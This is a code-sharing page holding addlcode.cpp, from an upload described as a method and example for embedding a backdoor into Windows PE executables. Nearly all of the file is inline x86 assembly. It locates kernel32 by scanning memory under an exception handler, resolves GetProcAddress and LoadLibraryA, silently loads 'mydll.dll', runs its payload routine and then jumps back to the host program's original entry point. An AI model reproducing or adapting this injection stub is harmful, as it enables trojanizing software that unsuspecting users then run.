📄 addlcode.cpp

📁 PE可执行文件的镶入式程序的编写方法及示例(镶入式后门程序&原程序) 由于Microsoft公司的Windows系统是当前大部分个人电脑所使用的操作系统主要包括win95,98,me,nt4,200
💻 CPP
字号:
/*
	利用异常结构处理搜索GetProcAddress入口地址
*/
#include <stdio.h>
#include <windows.h>
main()
{

	_asm
	{
		call ex//取得当前地址以计算异常结构开始的地址
		mov		eax,0x77000000
		mov		[ebp-0ch],eax
		mov     eax,esp
		sub     eax,8
		xchg    fs:[0],eax
		mov DWORD ptr[ebp-00h],eax
		mov	eax,fs:[4]
		mov DWORD ptr[ebp-04h],eax
		mov		fs:[4h],ebp//保存ebp到fs:[4h]中
		add		ecx,34h
		push    ecx
		push    eax
		mov     edx,0
		mov     byte ptr [edx],0//产生错误
	}


//异常结构开始
		_asm
		{
			mov	ebp,fs:[4]
			mov         dword ptr [ebp-8h],0
//for(;imgbase<0xff000000,procgetadd==0;){
e104f:
		   cmp         dword ptr [ebp-8h],0
		   jne         exi
//imgbase+=0x10000;
   mov         eax,[ebp-0ch]
   add         eax,10000h
   mov         [ebp-0ch],eax
//if(imgbase==0x78000000) imgbase=0xbff00000;
   cmp         dword ptr [ebp-0ch],78000000h
   jne         is44
   mov         dword ptr [ebp-0ch],0BFF00000h

/*if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
*)(imgbase+0x3c))=='EP'){*/

is44:

   mov         ecx,dword ptr [ebp-0ch]
   xor         edx,edx
   mov         dx,word ptr [ecx]
   mov         dword ptr [ebp-24h],ecx
   cmp         edx,5A4Dh//ZM
   jne         e11db
   mov         eax,[ebp-0ch]
   mov         ecx,dword ptr [eax+3Ch]
   mov         edx,dword ptr [ebp-0ch]
   xor         eax,eax
   mov         ax,word ptr [edx+ecx]
   cmp         eax,4550h
   jne         e11db
    
//fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
   mov         ecx,dword ptr [ebp-0ch]
   mov         edx,dword ptr [ecx+3Ch]
   mov         eax,[ebp-0ch]
   mov         ecx,dword ptr [eax+edx+78h]
   add         ecx,dword ptr [ebp-0ch]
   mov         dword ptr [ebp-10h],ecx
// k=*(int *)(fnbase+0xc)+imgbase;
   mov         edx,dword ptr [ebp-10h]
   mov         eax,dword ptr [edx+0Ch]
   add         eax,dword ptr [ebp-0ch]
   mov         dword ptr [ebp-14h],eax

//if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
   mov         ecx,dword ptr [ebp-14h]
   cmp         dword ptr [ecx],4E52454Bh
   jne         e11db
   mov         edx,dword ptr [ebp-14h]
   cmp         dword ptr [edx+4],32334C45h
   jne         e11db
//k=imgbase+*(int *)(fnbase+0x20);
   mov         eax,dword ptr [ebp-10h]
   mov         ecx,dword ptr [ebp-0ch]
   add         ecx,dword ptr [eax+20h]
   mov         dword ptr [ebp-14h],ecx
//for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
   mov         dword ptr [ebp-18h],0
   jmp         e1127
e1115:
   mov         edx,dword ptr [ebp-18h]
   add         edx,1
   mov         dword ptr [ebp-18h],edx
   mov         eax,dword ptr [ebp-14h]
   add         eax,4
   mov         dword ptr [ebp-14h],eax
e1127:
   mov         ecx,dword ptr [ebp-10h]
   mov         edx,dword ptr [ebp-18h]
   cmp         edx,dword ptr [ecx+18h]
   jge         e11db
/*if(*(int *)(imgbase+*(int *)k)=='tixE'&&*(int *)(4+imgbase+*(int
 *)k)=='corP'){GetProcAddress*/
   mov         eax,dword ptr [ebp-14h]
   mov         ecx,dword ptr [eax]
   mov         edx,dword ptr [ebp-0ch]
   cmp         dword ptr [edx+ecx],'PteG'
   jne         e11d6
   mov         eax,dword ptr [ebp-14h]
   mov         ecx,dword ptr [eax]
   mov         edx,dword ptr [ebp-0ch]
   cmp         dword ptr [edx+ecx+4],'Acor'
   jne         e11d6
//k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
   mov         eax,dword ptr [ebp-18h]
  add         eax,dword ptr [ebp-18h]
  add         eax,dword ptr [ebp-0ch]
  mov         ecx,dword ptr [ebp-10h]
   mov         edx,dword ptr [ecx+24h]
   xor         ecx,ecx
   mov         cx,word ptr [eax+edx]
   mov         dword ptr [ebp-14h],ecx
//k+=*(int *)(fnbase+0x10)-1;
   mov         edx,dword ptr [ebp-10h]
   mov         eax,dword ptr [edx+10h]
   mov         ecx,dword ptr [ebp-14h]
   lea         edx,dword ptr [ecx+eax-1]
   mov         dword ptr [ebp-14h],edx
//k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
   mov         eax,dword ptr [ebp-14h]
   add         eax,dword ptr [ebp-14h]
   add         eax,dword ptr [ebp-14h]
   add         eax,dword ptr [ebp-14h]
   add         eax,dword ptr [ebp-0ch]
   mov         ecx,dword ptr [ebp-10h]
   mov         edx,dword ptr [ecx+1Ch]
   mov         eax,dword ptr [eax+edx]
   mov         dword ptr [ebp-14h],eax
   mov         edx,dword ptr [ebp-14h]
//add edx,imgbase
   add         edx,dword ptr [ebp-0ch]
// mov procgetadd,edx
   mov         dword ptr [ebp-8h],edx

//恢复异常结构

		mov eax,DWORD ptr[ebp-00h]
		mov	fs:[0],eax
		mov eax,DWORD ptr[ebp-04h]
		mov	fs:[4],eax

   jmp         e11db
e11d6:
   jmp         e1115
e11db:
   jmp         e104f


}
//////////////////////////////////////////////////////////////
exi:
//取得LoadLibraryA入口地址

	_asm
	{
	mov         dword ptr [ebp-124h],'daoL'
	mov         dword ptr [ebp-120h],'rbiL'
	mov         dword ptr [ebp-11Ch],'Ayra'
	mov         dword ptr [ebp-118h],0000h
	lea eax,[ebp-124h]
	push eax 
	mov   ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址
	push ebx
	mov   eax,dword ptr [ebp-8h]
	mov   dword ptr [ebp-4008h],eax//GetProcAddress 入口地址
	call eax
	mov   dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址
	}

//加载 mydll.dll

	_asm
	{
	mov         dword ptr [ebp-124h],'ldym'
	mov         dword ptr [ebp-120h],'ld.l'
	mov         dword ptr [ebp-11Ch],'l'
	mov         dword ptr [ebp-118h],0000h
	lea eax,[ebp-124h]
	push eax 
	call dword ptr [ebp-400ch]
	cmp         eax,0
	jz	exit1
	mov ebx,eax

//取得mybegin入口地址

	mov         dword ptr [ebp-124h],'gebM'
	mov         dword ptr [ebp-120h],'ni'
	mov         dword ptr [ebp-11Ch],0000h
	mov         dword ptr [ebp-118h],0000h
	lea eax,[ebp-124h]
	push eax 
	push ebx
	call dword ptr [ebp-4008h]
	mov   dword ptr [ebp-4030h],eax//mybegin入口地址
	cmp         eax,0
	jz	exit1
	call eax //执行mybegin
	jmp exit1
		}

ex:
	_asm
	{
		pop ecx
		push ecx
		ret
	}
exit1:

   _asm
   {
	mov eax,0x401000 //这个跳转地址在代码中需要更改
	jmp eax
   }
return 0;
}
💿 文件大小 78 K
👤 上传用户 novelty1234
📂 所属分类其他
🏷️ 相关标签

#Microsoft #Windows #程序 #200
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -